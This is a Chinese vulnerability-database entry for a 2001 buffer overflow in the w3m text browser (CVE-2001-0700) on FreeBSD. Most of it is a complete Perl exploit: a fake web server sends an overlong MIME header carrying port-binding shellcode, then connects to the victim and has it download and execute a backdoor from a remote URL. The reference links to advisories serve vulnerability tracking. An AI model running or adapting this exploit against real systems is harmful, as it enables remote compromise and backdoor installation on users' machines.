w3m缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106396 漏洞类型 缓冲区溢出
发布时间 2001-06-19 更新时间 2005-05-02
CVE编号 CVE-2001-0700 CNNVD-ID CNNVD-200109-099
漏洞平台 FreeBSD CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/20941
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-099
|漏洞详情
w3m0.2.1以及之前版本存在缓冲区溢出漏洞。远程攻击者借助超长Base64编码MIME头执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/2895/info

W3M is a pager/text-based WWW browser similiar to lynx.

A buffer overflow vulnerability exists in the 'w3m' client program. The overflow occurs when a base64-encoded string exceeding approximately 32 characters in length is received in a MIME header field. As a result, it may be possible for a malicious remote server to execute arbitrary code on a user's system. 

#!/usr/bin/perl

# ---- exp_w3m.pl
# w3m remote buffer overflow exploit for FreeBSD.
# this fake httpd gives exploit code to visitor's w3m, then
# connects to victim's port 10000, downloads backdoor from
# $backdoor, and executes it.
# see also:
# ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:46.w3m.asc
# 
# 					White_E <white_e@bigfoot.com>
# 					http://ttj.virtualave.net/

$backdoor='http://www.../any.backdoor.prog.you.want';
$ret = 0xbfbffa2c;
$ret -= $ARGV[0];
$retb = pack("V",$ret); # little endian

$shellcode= # http://www.hack.co.za/download.php?sid=1444
            # portbind shell on 10000 by bighawk
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89".
"\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50".
"\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53".
"\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53".
"\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69".
"\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"; # 86 bytes

use Socket;
$port=80;
$|=1;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
select(S);$|=1;select(STDOUT);
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
$paddr=sockaddr_in($port,INADDR_ANY);
bind(S,$paddr) || die "ERR: bind()\n";
listen(S,SOMAXCONN) || die "ERR: listen()\n";
print "listen on $port.\n";
$str  = "A" x 36;
$str .= $retb;
$str .= "\x90" x 128;
$str .= $shellcode;

while (1) {
  $victim=accept(VIC,S);
  $vaddr=(sockaddr_in($victim))[1];
  select(VIC);$|=1;select(STDOUT);
  $in=<VIC>;
  $in=<VIC>;
  print VIC "HTTP/1.0 200 OK\r\n";
  print VIC "MIME-Version: 1.0\r\n";
  print VIC "Content-Type: multipart/mixed; boundary=\"__=?$str\r\n";
  print VIC "\r\n";
  sleep(1);
  socket(BD,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
  $paddr=sockaddr_in('10000',$vaddr) || die "ERR: sockaddr_in\n";
  connect(BD,$paddr) || die "ERR: connect()\n";
  select(BD);$|=1;select(STDOUT);
  print BD "/usr/local/bin/w3m -dump_source $backdoor > /tmp/hoge \; /bin/chmod +x /tmp/hoge \; 
/tmp/hoge & \n";
  print "backdoor has been set.\n";
  close(BD);
}
|参考资料

来源:XF
名称:w3m-mime-header-bo(6725)
链接:http://xforce.iss.net/static/6725.php
来源:BID
名称:2895
链接:http://www.securityfocus.com/bid/2895
来源:mi.med.tohoku.ac.jp
链接:http://mi.med.tohoku.ac.jp/~satodai/w3m-dev-en/200106.month/537.html
来源:BUGTRAQ
名称:20010621[SNSAdvisoryNo.32]w3mmalformedMIMEheaderBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/192371
来源:DEBIAN
名称:DSA-081
链接:http://www.debian.org/security/2001/dsa-081
来源:DEBIAN
名称:DSA-064
链接:http://www.debian.org/security/2001/dsa-064
来源:CONECTIVA
名称:CLA-2001:434
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000434